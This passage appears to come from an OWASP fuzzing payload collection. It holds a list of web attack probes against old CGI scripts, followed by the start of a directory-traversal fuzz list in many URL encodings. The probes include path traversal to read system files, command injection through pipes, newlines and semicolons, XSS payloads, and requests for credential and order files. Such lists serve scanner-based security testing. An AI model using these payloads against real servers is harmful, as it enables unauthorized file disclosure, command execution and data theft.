dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00<br />
dcshop/auth_data/auth_user_file.txt<br />
dcshop/orders/orders.txt<br />
dfire.cgi<br />
diagnose.cgi<br />
dig.cgi<br />
directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00<br />
displayTC.pl<br />
dnewsweb<br />
donothing<br />
dose.pl?daily&somefile.txt&|ls|<br />
download.cgi<br />
dumpenv.pl<br />
edit.pl<br />
empower?DB=whateverwhatever<br />
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
enter.cgi<br />
environ.cgi<br />
environ.pl<br />
environ.pl?param1=<script>alert(document.cookie)</script><br />
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
eshop.pl/seite=;cat%20eshop.pl|<br />
ex-logger.pl<br />
excite<br />
excite;IF<br />
ezadmin.cgi<br />
ezboard.cgi<br />
ezman.cgi<br />
ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|<br />
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1<br />
ezshopper2/loadpage.cgi<br />
ezshopper3/loadpage.cgi<br />
faqmanager.cgi?toc={KNOWNFILE}%00<br />
faxsurvey?cat%20{KNOWNFILE}<br />
filemail<br />
filemail.pl<br />
finger<br />
finger.pl<br />
flexform<br />
flexform.cgi<br />
fom.cgi?file=<script>alert('XSS')</script><br />
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable<br />
formmail<br />
formmail.cgi<br />
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail.pl<br />
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
fortune<br />
ftp.pl<br />
ftpsh<br />
gH.cgi<br />
gbadmin.cgi?action=change_adminpass<br />
gbadmin.cgi?action=change_automail<br />
gbadmin.cgi?action=colors<br />
gbadmin.cgi?action=setup<br />
gbook/gbook.cgi?_MAILTO=xx;ls<br />
gbpass.pl<br />
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1<br />
getdoc.cgi<br />
gettransbitmap<br />
glimpse<br />
gm-authors.cgi<br />
gm-cplog.cgi<br />
gm.cgi<br />
guestbook.cgi<br />
guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|<br />
guestbook.pl<br />
guestbook/passwd<br />
handler.cgi<br />
hitview.cgi<br />
horde/test.php<br />
horde/test.php?mode=phpinfo<br />
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00<br />
htgrep?file=index.html&hdr={KNOWNFILE}<br />
html2chtml.cgi<br />
html2wml.cgi<br />
htmlscript?../../../../../../../../../..{KNOWNFILE}<br />
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E<br />
htsearch?-c/nonexistant<br />
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=<br />
htsearch?exclude=%60{KNOWNFILE}%60<br />
ibill.pm<br />
icat<br />
if/admin/nph-build.cgi<br />
ikonboard/help.cgi?<br />
imageFolio.cgi<br />
imagefolio/admin/admin.cgi<br />
imagemap<br />
include/new-visitor.inc.php<br />
index.js0x70<br />
index.pl<br />
info2www<br />
info2www '(../../../../../../../bin/mail root <{KNOWNFILE}><br />
infosrch.cgi<br />
ion-p?page=../../../../..{KNOWNFILE}<br />
jailshell<br />
jj<br />
journal.cgi?folder=journal.cgi%00<br />
ksh<br />
lastlines.cgi?process<br />
listrec.pl<br />
loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}<br />
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
log-reader.cgi<br />
log/<br />
log/nether-log.pl?checkit<br />
login.cgi<br />
login.pl<br />
login.pl?course_id=\<br />
logit.cgi<br />
logs.pl<br />
logs/<br />
logs/access_log<br />
logs/error_log<br />
lookwho.cgi<br />
ls<br />
lwgate<br />
lwgate.cgi<br />
magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../..{KNOWNFILE}<br />
mail<br />
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00<br />
mailit.pl<br />
maillist.cgi<br />
maillist.pl<br />
mailnews.cgi<br />
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}<br />
majordomo.pl<br />
man2html<br />
mastergate/search.cgi?search=0&search_on=all<br />
meta.pl<br />
mgrqcgi<br />
mini_logger.cgi<br />
mmstdod.cgi<br />
moin.cgi?test<br />
mojo/mojo.cgi<br />
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=blah<br />
ms_proxy_auth_query/<br />
mt-static/<br />
mt-static/mt-check.cgi<br />
mt-static/mt-load.cgi<br />
mt-static/mt.cfg<br />
mt/<br />
mt/mt-check.cgi<br />
mt/mt-load.cgi<br />
mt/mt.cfg<br />
multihtml.pl?multi={KNOWNFILE}%00html<br />
musicqueue.cgi<br />
myguestbook.cgi?action=view<br />
namazu.cgi<br />
nbmember.cgi?cmd=list_all_users<br />
netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}<br />
netpad.cgi<br />
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}<br />
nimages.php<br />
nlog-smb.cgi<br />
nlog-smb.pl<br />
non-existent.pl<br />
noshell<br />
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
nph-error.pl<br />
nph-exploitscanget.cgi<br />
nph-maillist.pl<br />
nph-publish<br />
nph-publish.cgi<br />
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0<br />
nph-test-cgi<br />
ntitar.pl<br />
opendir.php?{KNOWNFILE}<br />
orders/orders.txt<br />
pagelog.cgi<br />
pals-cgi?palsAction=restart&documentName={KNOWNFILE}<br />
parse-file<br />
pass<br />
passwd<br />
passwd.txt<br />
password<br />
pbcgi.cgi?name=Joe%Camel&email=%3C<br />
perl<br />
perl?-v<br />
perlshop.cgi<br />
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}<br />
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
phf<br />
phf.cgi?QALIA<br />
phf?Qname=root%0Acat%20{KNOWNFILE}%20<br />
photo/<br />
photo/manage.cgi<br />
photo/protected/manage.cgi<br />
php-cgi<br />
php.cgi?{KNOWNFILE}<br />
plusmail<br />
pollit/Poll_It_<br />
pollssi.cgi<br />
post-query<br />
post_query<br />
postcards.cgi<br />
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
printenv<br />
printenv.tmp<br />
probecontrol.cgi?command=enable&username=cancer&password=killer<br />
processit.pl<br />
profile.cgi<br />
pu3.pl<br />
publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10<br />
query<br />
query?mss=%2e%2e/config<br />
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=<br />
quikstore.cfg<br />
quizme.cgi<br />
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
ratlog.cgi<br />
redirect<br />
register.cgi<br />
replicator/webpage.cgi/<br />
responder.cgi<br />
retrieve_password.pl<br />
rksh<br />
rmp_query<br />
robadmin.cgi<br />
robpoll.cgi<br />
rpm_query<br />
rsh<br />
rtm.log<br />
rwcgi60<br />
rwcgi60/showenv<br />
rwwwshell.pl<br />
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1<br />
sawmill?rfcf+%22<br />
sbcgi/sitebuilder.cgi<br />
scoadminreg.cgi<br />
scripts/*%0a.pl<br />
search.cgi<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
search.php?searchstring=<script>alert(document.cookie)</script><br />
search.pl<br />
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script><br />
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00<br />
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc<br />
sendform.cgi<br />
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message<br />
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}<br />
session/adminlogin<br />
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}<br />
sh<br />
shop.cgi?page=../../../../../../..{KNOWNFILE}<br />
shop.pl/page=;cat%20shop.pl|<br />
shop/auth_data/auth_user_file.txt<br />
shop/orders/orders.txt<br />
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}<br />
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|<br />
show.pl<br />
showcheckins.cgi?person=<script>alert('XSS')</script><br />
showuser.cgi<br />
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|<br />
simplestguest.cgi<br />
simplestmail.cgi<br />
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
sojourn.cgi?cat=../../../../../../../../../../etc/password%00<br />
spin_client.cgi?aaaaaaaa<br />
ss<br />
sscd_suncourier.pl<br />
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}<br />
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
stat.pl<br />
stat/<br />
stats-bin-p/reports/index.html<br />
stats.pl<br />
stats.prf<br />
stats/<br />
stats/statsbrowse.asp?filepath=c:\&Opt=3<br />
stats_old/<br />
statsconfig<br />
statusconfig.pl<br />
statview.pl<br />
store.cgi?<br />
store/agora.cgi?cart_id=<script>alert('XSS')</script><br />
store/agora.cgi?page=whatever33.html<br />
store/index.cgi?page=../../../../../../../..{KNOWNFILE}<br />
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
survey<br />
survey.cgi<br />
sws/admin.html<br />
sws/manager.pl<br />
tablebuild.pl<br />
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1<br />
tcsh<br />
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}<br />
test-cgi.tcl<br />
test-cgi?/*<br />
test-env<br />
test.cgi<br />
test/test.cgi<br />
texis/junk<br />
texis/phine<br />
textcounter.pl<br />
tidfinder.cgi<br />
tigvote.cgi<br />
title.cgi<br />
tpgnrock<br />
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
troops.cgi<br />
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}<br />
ultraboard.cgi<br />
ultraboard.pl<br />
unlg1.1<br />
unlg1.2<br />
update.dpgs<br />
upload.cgi<br />
uptime<br />
urlcount.cgi?%3CIMG%20<br />
ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}<br />
utm/admin<br />
utm/utm_stat<br />
view-source<br />
view-source?view-source<br />
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00<br />
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script><br />
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\<br />
viewlogs.pl<br />
viewsource?{KNOWNFILE}<br />
viralator.cgi<br />
virgil.cgi<br />
vote.cgi<br />
vpasswd.cgi<br />
vq/demos/respond.pl?<script>alert('XSS')</script><br />
w3-msql<br />
w3-sql<br />
wais.pl<br />
way-board.cgi?db={KNOWNFILE}%00<br />
way-board/way-board.cgi?db={KNOWNFILE}%00<br />
webais<br />
webbbs.cgi<br />
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20{KNOWNFILE}<br />
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE<br />
webdist.cgi?distloc=;cat%20{KNOWNFILE}<br />
webdriver<br />
webgais<br />
webif.cgi<br />
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
webmap.cgi<br />
webnews.pl<br />
webplus?about<br />
webplus?script=../../../../../../../../../..{KNOWNFILE}<br />
websendmail<br />
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}<br />
webutil.pl<br />
webutils.pl<br />
webwho.pl<br />
where.pl?sd=ls%20/etc<br />
whois.cgi?action=load&whois=%3Bid<br />
whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}<br />
windmail<br />
wrap<br />
wrap.cgi<br />
ws_ftp.ini<br />
www-sql<br />
wwwadmin.pl<br />
wwwboard.cgi.cgi<br />
wwwboard.pl<br />
wwwstats.pl<br />
wwwthreads/3tvars.pm<br />
wwwthreads/w3tvars.pm<br />
wwwwais<br />
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00<br />
zsh<br />
</pre><br />
<br />
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===<br />
<pre><br />
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) <br />
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni<br />
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a<br />
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. <br />
# adam.muntner@uietmove.com <br />
<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
..%c0%af{FILE}<br />
..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
